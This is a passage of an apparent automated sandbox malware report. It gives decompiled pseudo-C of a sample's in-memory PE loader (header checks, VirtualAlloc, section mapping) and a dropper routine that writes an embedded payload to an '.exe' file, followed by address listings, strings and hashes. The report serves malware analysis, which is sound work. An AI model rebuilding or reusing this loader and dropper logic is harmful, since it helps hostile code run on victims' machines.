																			return E0040EB3F(_t334, _t276, _v8 ^ _t373, _t322, _t336, _t354);
																		} else {
																			_t297 = _v72;
																			_t218 = _t215 + _t297;
																			if( *(_t334 + 0x14) == 0) {
																				 *((intOrPtr*)(_t334 + 0x38)) = _t218;
																				_pop(_t337);
																				_pop(_t355);
																				return E0040EB3F(_t334, _t276, _v8 ^ _t373, _t322, _t337, _t355);
																			} else {
																				_push(0);
																				_push(1);
																				_push(_t297);
																				if( *_t218() != 0) {
																					 *((intOrPtr*)(_t334 + 0x10)) = 1;
																					_pop(_t338);
																					_pop(_t356);
																					return E0040EB3F(_t334, _t276, _v8 ^ _t373, _t322, _t338, _t356);
																				} else {
																					SetLastError(0x45a);
																					goto L26;
																				}
																			}
																		}
																	}
																} else {
																	_t226 = _t352 + 0x64;
																	_v48 = _t226;
																	do {
																		_v56 =  *((intOrPtr*)(_t226 - 0x1c));
																		_t339 =  *((intOrPtr*)(_t226 - 0x14));
																		_t361 =  ~( *(_t334 + 0x3c)) & _v56;
																		_v52 = _t339;
																		_t334 = _v76;
																		if(_t339 == 0) {
																			if(( *_t226 & 0x00000040) == 0) {
																				if(( *_t226 & 0x00000080) != 0) {
																					_t340 =  *((intOrPtr*)(_t276 + 0x24));
																					goto L66;
																				}
																			} else {
																				_t340 =  *((intOrPtr*)(_t276 + 0x20));
																				L66:
																				_v52 = _t340;
																				_t334 = _v76;
																			}
																		}
																		if(_v64 == _t361) {
																			L72:
																			_t326 = _t326 |  *_t226;
																			asm("bt eax, 0x19");
																			if(_t326 >= 0) {
																				_t326 = _t326 & 0xfdffffff;
																			}
																			_t292 = _v52 - _v60 + _v56;
																			_t229 = _v48;
																			goto L75;
																		} else {
																			if(_v60 + _t292 > _t361) {
																				_t226 = _v48;
																				goto L72;
																			} else {
																				_t322 =  &_v96;
																				_t234 = E00402C00(_t276, _t334,  &_v96); // executed
																				if(_t234 == 0) {
																					goto L27;
																				} else {
																					_t235 = _v56;
																					_t292 = _v52;
																					_t276 =  *_t334;
																					_v60 = _t235;
																					_v96 = _t235;
																					_t236 = _t361;
																					_v64 = _t236;
																					_v92 = _t236;
																					_t229 = _v48;
																					_t326 =  *_t229;
																					goto L75;
																				}
																			}
																		}
																		goto L90;
																		L75:
																		_v48 =  &(_t229[0xa]);
																		_t363 = _v68 + 1;
																		_v84 = _t326;
																		_t226 = _v48;
																		_v88 = _t292;
																		_v68 = _t363;
																	} while (_t363 < ( *(_t276 + 6) & 0x0000ffff));
																	goto L76;
																}
															}
														} else {
															_t276 = _t204 + _t284;
															do {
																_t310 =  *((intOrPtr*)(_t276 + 4));
																if(_t310 != 0) {
																	if(_v56 <  *(_t276 + 8) + _t310) {
																		goto L25;
																	} else {
																		_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t310, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34))); // executed
																		_t376 = _t375 + 0x14;
																		if(_t250 == 0) {
																			goto L27;
																		} else {
																			_t366 =  *_t276 + _v52;
																			E00410440(_t366, _v48 +  *(_t276 + 8),  *((intOrPtr*)(_t276 + 4)));
																			 *((intOrPtr*)(_t276 - 4)) = _t366;
																			goto L37;
																		}
																	}
																} else {
																	_t369 =  *((intOrPtr*)( &(_v48[0xe]) + _v68));
																	if(_t369 <= 0) {
																		goto L38;
																	} else {
																		_t259 =  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x1c))))( *_t276 + _t322, _t369, 0x1000, 4,  *((intOrPtr*)(_t334 + 0x34)));
																		_t376 = _t375 + 0x14;
																		if(_t259 == 0) {
																			goto L27;
																		} else {
																			 *((intOrPtr*)(_t276 - 4)) =  *_t276 + _v52;
																			E00410A80(_t334,  *_t276 + _v52, 0, _t369);
																			L37:
																			_t322 = _v52;
																			_t375 = _t376 + 0xc;
																			goto L38;
																		}
																	}
																}
																goto L90;
																L38:
																_t284 =  *_t334;
																_t276 = _t276 + 0x28;
																_t368 = _v60 + 1;
																_v60 = _t368;
															} while (_t368 < ( *(_t284 + 6) & 0x0000ffff));
															_t276 = _v64;
															goto L40;
														}
													} else {
														L25:
														SetLastError(0xd);
														L26:
														L27:
														E00403680(_t334);
														_pop(_t335);
														_pop(_t350);
														return E0040EB3F(0, _t276, _v8 ^ _t373, _t322, _t335, _t350);
													}
												} else {
													VirtualFree(_t282, _t192, 0x8000);
													SetLastError(0xe);
													goto L5;
												}
											} else {
												_t266 = VirtualAlloc(_t190, _t333, 0x3000, 4);
												_v72 = _t266;
												if(_t266 != 0) {
													goto L22;
												} else {
													_push("ERROR_OUTOFMEMORY!\n");
													E00402BD0();
													SetLastError(0xe);
													goto L5;
												}
											}
										} else {
											_push("alignedImageSize != AlignValueUp!\n");
											goto L4;
										}
									} else {
										_push("Section alignment invalid!\n");
										goto L4;
									}
								} else {
									_push("FileHeader.Machine != HOST_MACHINE!\n");
									goto L4;
								}
							} else {
								_push("Signature != IMAGE_NT_SIGNATURE!\n");
								goto L4;
							}
						} else {
							SetLastError(0xd);
							_push("DOS header size is not valid!\n");
							E00402BD0();
							_pop(_t343);
							_pop(_t371);
							return E0040EB3F(0, _t276, _v8 ^ _t373, _t322, _t343, _t371);
						}
					} else {
						_push("DOS header is not valid!\n");
						L4:
						E00402BD0();
						SetLastError(0xc1);
						L5:
						_pop(_t342);
						_pop(_t370);
						return E0040EB3F(0, _t276, _v8 ^ _t373, _t322, _t342, _t370);
					}
				} else {
					SetLastError(0xd);
					_push("Size is not valid!\n");
					E00402BD0();
					_pop(_t344);
					_pop(_t372);
					return E0040EB3F(0, _t276, _v8 ^ _t373, _t322, _t344, _t372);
				}
				L90:
			}

0x00402f26
0x00402f2d
0x00402f31
0x00402f33
0x00402f36
0x00402f38
0x00402f3b
0x00402f42
0x00402f74
0x00402fa1
0x00402fa4
0x00402faf
0x00402fe0
0x00402fe3
0x00402fe6
0x00402ff8
0x00403004
0x0040300a
0x0040301a
0x0040301e
0x00403023
0x00403025
0x00403027
0x00403027
0x0040302a
0x0040302f
0x00403032
0x00403037
0x0040303a
0x0040303c
0x0040303f
0x0040303f
0x00403027
0x00403048
0x0040304e
0x00403057
0x00403061
0x00403067
0x00403084
0x00403086
0x0040308b
0x004030b3
0x004030be
0x004030c4
0x004030c7
0x004030c9
0x004030ce
0x004030e4
0x004030f1
0x004030f8
0x004030fb
0x00403102
0x00403109
0x00403110
0x00403117
0x00403121
0x00403124
0x0040312a
0x00403157
0x0040315c
0x00403162
0x0040316a
0x00403170
0x0040317a
0x0040317e
0x00403180
0x00403183
0x00403185
0x00403188
0x0040318f
0x00403196
0x0040324f
0x00403252
0x00403255
0x00403258
0x004032dd
0x004032dd
0x0040325e
0x00403265
0x0040326b
0x00403274
0x00403276
0x00403279
0x0040327d
0x00403280
0x00403280
0x00403285
0x00403288
0x0040328b
0x00403295
0x00403297
0x0040329a
0x004032a0
0x004032a0
0x004032b1
0x004032bb
0x004032bb
0x004032be
0x004032c1
0x004032c2
0x004032ca
0x004032a0
0x004032ce
0x004032d1
0x004032d3
0x004032d6
0x004032da
0x004032da
0x00000000
0x00403267
0x00403267
0x00403267
0x00403265
0x004032e4
0x004032ee
0x00000000
0x004032f4
0x004032f4
0x004032ff
0x00403301
0x00403304
0x00403306
0x00403309
0x0040330c
0x0040330f
0x00403312
0x00403317
0x00403319
0x0040331e
0x00403327
0x00403329
0x00403329
0x00403320
0x00403320
0x00403320
0x0040331e
0x0040332c
0x00403334
0x00403337
0x0040333a
0x00403341
0x0040334c
0x00403415
0x00403415
0x00403418
0x00403421
0x00403428
0x00000000
0x0040342e
0x0040342e
0x00403430
0x00403432
0x0040343a
0x0040343c
0x0040343f
0x00403445
0x00403447
0x0040344b
0x00403450
0x00403455
0x00403457
0x0040345a
0x0040345d
0x00403461
0x00403461
0x0040344b
0x00403445
0x00403463
0x00403468
0x004034bf
0x004034c8
0x004034c9
0x004034d3
0x0040346a
0x0040346a
0x0040346d
0x00403473
0x004034a4
0x004034a9
0x004034aa
0x004034b9
0x00403475
0x00403475
0x00403477
0x00403479
0x0040347e
0x0040348a
0x00403493
0x00403494
0x004034a3
0x00403480
0x0040312e
0x00000000
0x0040312e
0x0040347e
0x00403473
0x00403468
0x00403352
0x00403352
0x00403355
0x00403360
0x00403363
0x00403369
0x0040336e
0x00403373
0x00403376
0x00403379
0x0040337e
0x00403388
0x0040338a
0x00000000
0x0040338a
0x00403380
0x00403380
0x0040338d
0x0040338d
0x00403390
0x00403390
0x0040337e
0x00403396
0x004033d3
0x004033d9
0x004033db
0x004033df
0x004033e1
0x004033e1
0x004033ed
0x004033f0
0x00000000
0x00403398
0x0040339f
0x004033d0
0x00000000
0x004033a1
0x004033a1
0x004033a6
0x004033ad
0x00000000
0x004033b3
0x004033b3
0x004033b6
0x004033b9
0x004033bb
0x004033be
0x004033c1
0x004033c3
0x004033c6
0x004033c9
0x004033cc
0x00000000
0x004033cc
0x004033ad
0x0040339f
0x00000000
0x004033f3
0x004033f9
0x004033fc
0x00403403
0x00403406
0x00403409
0x0040340c
0x0040340c
0x00000000
0x00403360
0x0040334c
0x0040319c
0x0040319c
0x004031a0
0x004031a0
0x004031a5
0x004031f0
0x00000000
0x004031f6
0x00403209
0x0040320b
0x00403210
0x00000000
0x00403216
0x00403221
0x00403226
0x0040322b
0x00000000
0x0040322b
0x00403210
0x004031a7
0x004031ad
0x004031b3
0x00000000
0x004031b5
0x004031c8
0x004031ca
0x004031cf
0x00000000
0x004031d5
0x004031de
0x004031e1
0x0040322e
0x0040322e
0x00403231
0x00000000
0x00403231
0x004031cf
0x004031b3
0x00000000
0x00403234
0x00403234
0x00403236
0x0040323c
0x0040323d
0x00403244
0x0040324c
0x00000000
0x0040324c
0x0040312c
0x0040312c
0x0040312e
0x0040312e
0x00403134
0x00403136
0x0040313d
0x0040313e
0x0040314d
0x0040314d
0x004030d0
0x004030d7
0x00402f88
0x00000000
0x00402f88
0x0040308d
0x00403096
0x00403098
0x0040309d
0x00000000
0x0040309f
0x0040309f
0x004030a4
0x00402f88
0x00000000
0x00402f88
0x0040309d
0x00403069
0x00403069
0x00000000
0x00403069
0x0040300c
0x0040300c
0x00000000
0x0040300c
0x00402ffa
0x00402ffa
0x00000000
0x00402ffa
0x00402fe8
0x00402fe8
0x00000000
0x00402fe8
0x00402fb1
0x00402fb3
0x00402fb9
0x00402fbe
0x00402fc8
0x00402fc9
0x00402fd8
0x00402fd8
0x00402f76
0x00402f76
0x00402f7b
0x00402f7b
0x00402f88
0x00402f88
0x00402f90
0x00402f91
0x00402fa0
0x00402fa0
0x00402f44
0x00402f46
0x00402f4c
0x00402f51
0x00402f5b
0x00402f5c
0x00402f6b
0x00402f6b
0x00000000

APIs

SetLastError.KERNEL32(0000000D,?), ref: 00402F46
SetLastError.KERNEL32(000000C1), ref: 00402F88

Strings

DOS header size is not valid!, xrefs: 00402FB9
alignedImageSize != AlignValueUp!, xrefs: 00403069
FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FFA
@, xrefs: 00402F3F
Section alignment invalid!, xrefs: 0040300C
ERROR_OUTOFMEMORY!, xrefs: 0040309F
DOS header is not valid!, xrefs: 00402F76
Size is not valid!, xrefs: 00402F4C
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FE8

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
API String ID: 1452528299-393758929
Opcode ID: 71f8e6b596955476381fdf7a4d400e543c328e13e02967facd8fd06c75a4db19
Instruction ID: eb1d033f4db647f4909ffcafeb99e9f876381f028043ab1d6d4c39bbe72cca07
Opcode Fuzzy Hash: 71f8e6b596955476381fdf7a4d400e543c328e13e02967facd8fd06c75a4db19
Instruction Fuzzy Hash: 12128C71A012159BCB14CFA9D981BADBBB5FF48305F14416AE809BB3C1DB78ED41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406800 Relevance: 24.4, APIs: 8, Strings: 5, Instructions: 1613
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00406800(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v29;
				char _v32;
				char _v33;
				signed int _v36;
				long _v40;
				signed int _v44;
				char _v60;
				long _v64;
				struct _SECURITY_ATTRIBUTES* _v68;
				char _v84;
				long _v88;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v108;
				char _v116;
				intOrPtr _v128;
				struct _SECURITY_ATTRIBUTES* _v136;
				char _v144;
				signed int _v152;
				char _v312;
				signed char _v316;
				struct _SECURITY_ATTRIBUTES* _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				struct _SECURITY_ATTRIBUTES* _v336;
				long _v340;
				struct _SECURITY_ATTRIBUTES* _v344;
				char _v360;
				long _v364;
				struct _SECURITY_ATTRIBUTES* _v368;
				char _v384;
				long _v388;
				char _v408;
				char _v412;
				char _v413;
				struct _SECURITY_ATTRIBUTES* _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				struct _SECURITY_ATTRIBUTES* _v440;
				struct _SECURITY_ATTRIBUTES* _v444;
				struct _SECURITY_ATTRIBUTES* _v448;
				struct _SECURITY_ATTRIBUTES* _v464;
				long _v468;
				struct _SECURITY_ATTRIBUTES* _v472;
				char _v488;
				long _v496;
				struct _SECURITY_ATTRIBUTES* _v500;
				struct _SECURITY_ATTRIBUTES* _v516;
				long _v520;
				struct _SECURITY_ATTRIBUTES* _v616;
				char _v624;
				signed int _v628;
				char _v772;
				char _v1100;
				signed char _v1104;
				intOrPtr _v1108;
				signed int _v1112;
				intOrPtr _v1116;
				char _v1140;
				char _v1164;
				char _v1188;
				char _v1212;
				char _v1236;
				char _v1260;
				char _v1284;
				signed int _v1844;
				short _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				void* __ebp;
				signed int _t852;
				int _t857;
				void* _t858;
				char* _t859;
				void* _t865;
				long _t867;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t878;
				intOrPtr _t882;
				signed char _t883;
				signed int _t884;
				char* _t888;
				void* _t890;
				signed int _t896;
				intOrPtr _t897;
				signed int _t898;
				char* _t902;
				void* _t904;
				signed int _t910;
				intOrPtr _t911;
				signed char _t912;
				signed int _t913;
				char* _t917;
				void* _t919;
				signed int _t925;
				void* _t932;
				char* _t933;
				intOrPtr _t940;
				signed int _t947;
				signed int _t948;
				signed int _t950;
				void* _t954;
				void* _t957;
				void* _t959;
				void* _t960;
				void* _t961;
				void* _t962;
				void* _t963;
				void* _t972;
				signed int _t973;
				signed int _t976;
				signed int _t982;
				void* _t988;
				void* _t989;
				signed int _t991;
				void* _t996;
				void* _t1000;
				void* _t1001;
				signed int _t1003;
				signed int _t1007;
				intOrPtr _t1010;
				signed int _t1018;
				void* _t1019;
				signed char _t1022;
				char* _t1026;
				intOrPtr _t1027;
				signed char _t1031;
				signed int _t1034;
				signed int _t1036;
				char _t1040;
				struct _SECURITY_ATTRIBUTES* _t1041;
				struct _SECURITY_ATTRIBUTES* _t1045;
				intOrPtr _t1049;
				signed int _t1056;
				void* _t1061;
				char* _t1062;
				intOrPtr _t1066;
				intOrPtr _t1070;
				intOrPtr _t1074;
				struct _SECURITY_ATTRIBUTES* _t1078;
				intOrPtr _t1082;
				char _t1087;
				struct _SECURITY_ATTRIBUTES* _t1088;
				struct _SECURITY_ATTRIBUTES* _t1092;
				intOrPtr _t1096;
				signed int _t1103;
				void* _t1110;
				char* _t1111;
				intOrPtr _t1115;
				intOrPtr _t1119;
				struct _SECURITY_ATTRIBUTES* _t1123;
				intOrPtr _t1127;
				char _t1132;
				struct _SECURITY_ATTRIBUTES* _t1133;
				struct _SECURITY_ATTRIBUTES* _t1137;
				intOrPtr _t1141;
				signed int _t1153;
				signed int _t1155;
				signed int _t1158;
				void* _t1161;
				void* _t1162;
				signed int _t1168;
				intOrPtr _t1170;
				signed char _t1171;
				signed int _t1172;
				char* _t1176;
				void* _t1178;
				signed int _t1184;
				intOrPtr _t1185;
				signed int _t1186;
				char* _t1190;
				void* _t1192;
				signed int _t1198;
				intOrPtr _t1199;
				signed char _t1200;
				signed int _t1201;
				char* _t1205;
				void* _t1207;
				signed int _t1213;
				intOrPtr _t1214;
				intOrPtr _t1218;
				void* _t1222;
				char* _t1223;
				intOrPtr _t1227;
				intOrPtr _t1231;
				struct _SECURITY_ATTRIBUTES* _t1235;
				intOrPtr _t1239;
				char _t1244;
				struct _SECURITY_ATTRIBUTES* _t1245;
				struct _SECURITY_ATTRIBUTES* _t1249;
				intOrPtr _t1253;
				signed int _t1260;
				void* _t1265;
				char* _t1266;
				intOrPtr _t1270;
				intOrPtr _t1273;
				struct _SECURITY_ATTRIBUTES* _t1277;
				intOrPtr _t1281;
				char _t1286;
				struct _SECURITY_ATTRIBUTES* _t1287;
				struct _SECURITY_ATTRIBUTES* _t1291;
				intOrPtr _t1295;
				signed int _t1302;
				void* _t1309;
				char* _t1310;
				intOrPtr _t1314;
				intOrPtr _t1317;
				struct _SECURITY_ATTRIBUTES* _t1321;
				struct _SECURITY_ATTRIBUTES* _t1325;
				char _t1330;
				struct _SECURITY_ATTRIBUTES* _t1331;
				struct _SECURITY_ATTRIBUTES* _t1335;
				struct _SECURITY_ATTRIBUTES* _t1339;
				void* _t1351;
				char* _t1352;
				intOrPtr _t1356;
				intOrPtr _t1359;
				struct _SECURITY_ATTRIBUTES* _t1363;
				struct _SECURITY_ATTRIBUTES* _t1367;
				char _t1372;
				intOrPtr _t1373;
				struct _SECURITY_ATTRIBUTES* _t1378;
				signed int _t1382;
				intOrPtr _t1384;
				intOrPtr _t1390;
				intOrPtr _t1395;
				intOrPtr _t1399;
				char _t1404;
				void* _t1407;
				void* _t1409;
				void* _t1414;
				char* _t1418;
				long _t1421;
				intOrPtr* _t1425;
				struct _SECURITY_ATTRIBUTES* _t1428;
				void* _t1433;
				intOrPtr* _t1434;
				struct _SECURITY_ATTRIBUTES* _t1437;
				void* _t1442;
				signed char* _t1443;
				struct _SECURITY_ATTRIBUTES* _t1446;
				void* _t1451;
				char* _t1463;
				long _t1514;
				signed int _t1532;
				struct _SECURITY_ATTRIBUTES* _t1534;
				struct _SECURITY_ATTRIBUTES* _t1535;
				char _t1536;
				char* _t1541;
				intOrPtr _t1542;
				char _t1543;
				char _t1544;
				struct _SECURITY_ATTRIBUTES* _t1545;
				char _t1546;
				struct _SECURITY_ATTRIBUTES* _t1547;
				struct _SECURITY_ATTRIBUTES* _t1548;
				char _t1549;
				char* _t1553;
				char _t1554;
				char _t1555;
				struct _SECURITY_ATTRIBUTES* _t1556;
				char _t1557;
				struct _SECURITY_ATTRIBUTES* _t1558;
				struct _SECURITY_ATTRIBUTES* _t1559;
				char _t1560;
				intOrPtr* _t1561;
				signed int _t1562;
				char* _t1566;
				void* _t1572;
				intOrPtr* _t1573;
				struct _SECURITY_ATTRIBUTES* _t1576;
				void* _t1581;
				intOrPtr* _t1582;
				struct _SECURITY_ATTRIBUTES* _t1585;
				void* _t1590;
				signed char* _t1591;
				struct _SECURITY_ATTRIBUTES* _t1594;
				void* _t1599;
				char _t1600;
				char _t1601;
				char* _t1605;
				char _t1606;
				char _t1607;
				struct _SECURITY_ATTRIBUTES* _t1608;
				char _t1609;
				struct _SECURITY_ATTRIBUTES* _t1610;
				struct _SECURITY_ATTRIBUTES* _t1611;
				char _t1612;
				char* _t1617;
				char _t1618;
				struct _SECURITY_ATTRIBUTES* _t1619;
				intOrPtr _t1620;
				struct _SECURITY_ATTRIBUTES* _t1621;
				struct _SECURITY_ATTRIBUTES* _t1622;
				intOrPtr _t1623;
				char* _t1627;
				char _t1628;
				struct _SECURITY_ATTRIBUTES* _t1629;
				struct _SECURITY_ATTRIBUTES* _t1630;
				struct _SECURITY_ATTRIBUTES* _t1631;
				struct _SECURITY_ATTRIBUTES* _t1632;
				struct _SECURITY_ATTRIBUTES* _t1633;
				char* _t1637;
				intOrPtr _t1638;
				struct _SECURITY_ATTRIBUTES* _t1639;
				struct _SECURITY_ATTRIBUTES* _t1640;
				intOrPtr _t1641;
				struct _SECURITY_ATTRIBUTES* _t1642;
				intOrPtr* _t1643;
				intOrPtr _t1645;
				intOrPtr _t1646;
				intOrPtr _t1647;
				intOrPtr _t1648;
				struct _SECURITY_ATTRIBUTES* _t1651;
				long _t1652;
				long _t1653;
				long _t1654;
				long _t1655;
				intOrPtr _t1656;
				char* _t1657;
				void* _t1660;
				struct _SECURITY_ATTRIBUTES* _t1661;
				long _t1663;
				struct _SECURITY_ATTRIBUTES* _t1664;
				struct _SECURITY_ATTRIBUTES* _t1665;
				void* _t1666;
				struct _SECURITY_ATTRIBUTES* _t1667;
				long _t1669;
				struct _SECURITY_ATTRIBUTES* _t1670;
				struct _SECURITY_ATTRIBUTES* _t1671;
				signed char* _t1672;
				struct _SECURITY_ATTRIBUTES* _t1673;
				long _t1675;
				struct _SECURITY_ATTRIBUTES* _t1676;
				struct _SECURITY_ATTRIBUTES* _t1680;
				DWORD* _t1699;
				void* _t1700;
				struct _SECURITY_ATTRIBUTES* _t1703;
				long _t1704;
				struct _SECURITY_ATTRIBUTES* _t1705;
				long _t1706;
				long _t1707;
				void* _t1708;
				void* _t1709;
				DWORD* _t1710;
				void* _t1711;
				DWORD* _t1712;
				void* _t1713;
				struct _SECURITY_ATTRIBUTES* _t1716;
				long _t1717;
				struct _SECURITY_ATTRIBUTES* _t1718;
				long _t1719;
				long _t1720;
				void* _t1721;
				void* _t1722;
				DWORD* _t1723;
				void* _t1724;
				DWORD* _t1725;
				void* _t1726;
				intOrPtr* _t1727;
				struct _SECURITY_ATTRIBUTES* _t1732;
				long _t1733;
				void* _t1734;
				signed char _t1735;
				struct _SECURITY_ATTRIBUTES* _t1737;
				struct _SECURITY_ATTRIBUTES* _t1738;
				signed char _t1739;
				void* _t1740;
				struct _SECURITY_ATTRIBUTES* _t1741;
				long _t1743;
				struct _SECURITY_ATTRIBUTES* _t1744;
				struct _SECURITY_ATTRIBUTES* _t1745;
				signed char* _t1746;
				struct _SECURITY_ATTRIBUTES* _t1747;
				long _t1749;
				struct _SECURITY_ATTRIBUTES* _t1750;
				struct _SECURITY_ATTRIBUTES* _t1751;
				long _t1752;
				void* _t1753;
				struct _SECURITY_ATTRIBUTES* _t1756;
				long _t1757;
				struct _SECURITY_ATTRIBUTES* _t1758;
				long _t1759;
				long _t1760;
				void* _t1761;
				void* _t1762;
				DWORD* _t1763;
				void* _t1764;
				DWORD* _t1765;
				void* _t1766;
				struct _SECURITY_ATTRIBUTES* _t1769;
				long _t1770;
				struct _SECURITY_ATTRIBUTES* _t1771;
				long _t1772;
				long _t1773;
				void* _t1774;
				DWORD* _t1775;
				void* _t1776;
				DWORD* _t1777;
				void* _t1778;
				struct _SECURITY_ATTRIBUTES* _t1781;
				struct _SECURITY_ATTRIBUTES* _t1782;
				struct _SECURITY_ATTRIBUTES* _t1783;
				long _t1784;
				long _t1785;
				void* _t1786;
				DWORD* _t1787;
				DWORD* _t1788;
				DWORD* _t1789;
				DWORD* _t1790;
				struct _SECURITY_ATTRIBUTES* _t1793;
				struct _SECURITY_ATTRIBUTES* _t1794;
				struct _SECURITY_ATTRIBUTES* _t1795;
				long _t1796;
				long _t1797;
				void* _t1798;
				DWORD* _t1799;
				DWORD* _t1800;
				DWORD* _t1801;
				void* _t1802;
				char* _t1803;
				void* _t1804;
				void* _t1805;
				void* _t1806;
				void* _t1807;
				long _t1808;
				void* _t1809;
				void* _t1812;
				long _t1813;
				long _t1815;
				void* _t1816;
				signed int _t1819;
				signed int _t1825;
				signed int _t1828;
				signed int _t1830;
				signed int _t1831;
				void* _t1833;
				signed int _t1836;
				void* _t1837;
				void* _t1838;
				signed int _t1844;
				void* _t1845;
				void* _t1846;
				signed char _t1847;
				void* _t1848;
				void* _t1849;
				void* _t1850;
				signed char _t1851;
				void* _t1852;
				void* _t1853;
				signed int _t1854;
				signed char _t1855;
				void* _t1856;
				void* _t1857;
				void* _t1862;
				void* _t1868;
				void* _t1869;
				signed int _t1870;
				void* _t1876;
				char _t1885;
				void* _t1886;
				void* _t1887;
				signed char _t1888;
				void* _t1889;
				void* _t1890;
				signed char _t1891;
				void* _t1892;
				void* _t1893;
				signed char _t1894;
				void* _t1895;

				_t1812 = __esi;
				_t1807 = __edi;
				_t1414 = __ecx;
				_push(__ebx);
				_t1407 = _t1833;
				_t1836 = (_t1833 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t1407 + 4));
				_t1825 = _t1836;
				_push(0xffffffff);
				_push(0x42c6eb);
				_push( *[fs:0x0]);
				_push(_t1407);
				_t1837 = _t1836 - 0x54;
				_push(__esi);
				_t852 =  *0x43d054; // 0x8e1b5714
				_push(_t852 ^ _t1825);
				 *[fs:0x0] =  &_v24;
				_v16 = 1;
				_t856 =  >=  ?  *((void*)(_t1407 + 8)) : _t1407 + 8;
				_t857 = CreateDirectoryA( >=  ?  *((void*)(_t1407 + 8)) : _t1407 + 8, 0); // executed
				if(_t857 != 0 || GetLastError() == 0xb7) {
					_push(_t1414);
					_t858 = E0040C6F0( &_v108, _t1407 + 8);
					_v16 = 2;
					_t859 = E0040C910( &_v84, _t858, _t1407 + 0x20);
					_t1838 = _t1837 + 8;
					_t1418 = _t859;
					_v16 = 3;
					_t1813 =  *(_t1418 + 0x14);
					_t1651 =  *(_t1418 + 0x10);
					if(_t1813 - _t1651 < 4) {
						_v33 = 0;
						_t1418 = E00402990(_t1407, _t1418, _t1807, _t1813, 4, _v33, ".exe", 4);
					} else {
						 *(_t1418 + 0x10) =  &(_t1651->lpSecurityDescriptor);
						_t1404 = _t1418;
						if(_t1813 >= 0x10) {
							_t1404 =  *_t1418;
						}
						 *((intOrPtr*)(_t1404 + _t1651)) = 0x6578652e;
						 *((char*)(_t1404 +  &(_t1651->lpSecurityDescriptor))) = 0;
					}
					asm("movups xmm0, [ecx]");
					asm("movups [ebp-0x30], xmm0");
					asm("movq xmm0, [ecx+0x10]");
					asm("movq [ebp-0x20], xmm0");
					 *(_t1418 + 0x10) = 0;
					 *(_t1418 + 0x14) = 0xf;
					 *_t1418 = 0;
					_t864 =  >=  ? _v60 :  &_v60;
					_t865 = E00413CDD( >=  ? _v60 :  &_v60, "wb"); // executed
					_t1652 = _v40;
					_t1837 = _t1838 + 8;
					_t1812 = _t865;
					if(_t1652 < 0x10) {
						L11:
						_t1653 = _v64;
						_v44 = 0;
						_v40 = 0xf;
						_v60 = 0;
						if(_t1653 < 0x10) {
							L15:
							_t1654 = _v88;
							_v68 = 0;
							_v64 = 0xf;
							_v84 = 0;
							if(_t1654 < 0x10) {
								L19:
								_v92 = 0;
								_v88 = 0xf;
								_v108 = 0;
								_t1919 = _t1812;
								if(_t1812 == 0) {
									goto L21;
								} else {
									E00418588(_t1407, _t1807, _t1812, 0x43daa0, 1, 0x12000, _t1812); // executed
									_push(_t1812);
									E00413EFD(_t1407, _t1807, _t1812, _t1919);
									_t1837 = _t1837 + 0x14;
									_v29 = 1;
								}
								goto L22;
							} else {
								_t1646 = _v108;
								_t1804 = _t1654 + 1;
								_t1390 = _t1646;
								if(_t1804 < 0x1000) {
									L18:
									_push(_t1804);
									E0040ED7F(_t1646);
									_t1837 = _t1837 + 8;
									goto L19;
								} else {
									_t1421 =  *(_t1646 - 4);
									_t1657 = _t1804 + 0x23;
									if(_t1390 - _t1421 + 0xfffffffc > 0x1f) {
										goto L31;
									} else {
										goto L18;
									}
								}
							}
						} else {
							_t1647 = _v84;
							_t1805 = _t1653 + 1;
							_t1395 = _t1647;
							if(_t1805 < 0x1000) {
								L14:
								_push(_t1805);
								E0040ED7F(_t1647);
								_t1837 = _t1837 + 8;
								goto L15;
							} else {
								_t1421 =  *(_t1647 - 4);
								_t1657 = _t1805 + 0x23;
								if(_t1395 - _t1421 + 0xfffffffc > 0x1f) {
									goto L31;
								} else {
									goto L14;
								}
							}
						}
					} else {
						_t1648 = _v60;
						_t1806 = _t1652 + 1;
						_t1399 = _t1648;
						if(_t1806 < 0x1000) {
							L10:
							_push(_t1806);
							E0040ED7F(_t1648);
							_t1837 = _t1837 + 8;
							goto L11;
						} else {
							_t1421 =  *(_t1648 - 4);
							_t1657 = _t1806 + 0x23;
							if(_t1399 - _t1421 + 0xfffffffc > 0x1f) {
								L31:
								E004134A7(_t1407, _t1657, __eflags);
								goto L32;
							} else {
								goto L10;
							}
						}
					}
				} else {
					L21:
					_v29 = 0;
					L22:
					_t1655 =  *(_t1407 + 0x1c);
					if(_t1655 < 0x10) {
						L26:
						_t1656 =  *((intOrPtr*)(_t1407 + 0x34));
						 *(_t1407 + 0x18) = 0;
						 *(_t1407 + 0x1c) = 0xf;
						 *((char*)(_t1407 + 8)) = 0;
						if(_t1656 < 0x10) {
							L30:
							 *[fs:0x0] = _v24;
							return _v29;
						} else {
							_t1421 =  *(_t1407 + 0x20);
							_t1657 = _t1656 + 1;
							_t867 = _t1421;
							if(_t1657 < 0x1000) {
								L29:
								_push(_t1657);
								E0040ED7F(_t1421);
								goto L30;
							} else {
								_t1421 =  *(_t1421 - 4);
								_t1657 =  &(_t1657[0x23]);
